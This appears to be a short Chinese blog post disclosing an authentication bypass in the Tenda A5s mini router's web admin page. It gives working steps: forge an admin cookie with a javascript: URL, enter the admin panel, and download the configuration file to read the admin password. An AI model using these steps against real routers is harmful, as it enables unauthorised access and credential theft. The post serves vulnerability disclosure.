前天在易迅买了个迷你路由器,腾达 A5s,比以前用的TP还小,是我用过的最小路由器。
穿墙效果一般。测试的时候发现web管理界面存在登陆绕过。
一般流程登陆后,程序会向浏览器写入如下Cookie:
admin:language=zh-cn
可以看到,连明文密码都没保存,更不要说Base64转码了。
利用的方式非常简单:
1) 在浏览器地址栏输入javascript:document.cookie=’admin:language=zh-cn’
2) 再次输入路由器IP,即可进入后台,例如,我的路由器:http://192.168.2.1/
3) 接着下载配置文件,可查看admin的密码:
http://192.168.2.1/cgi-bin/DownloadCfg/RouterCfm.cfg
局限是: 首先得连接到无线路由器。这意味着可能要WPA破解。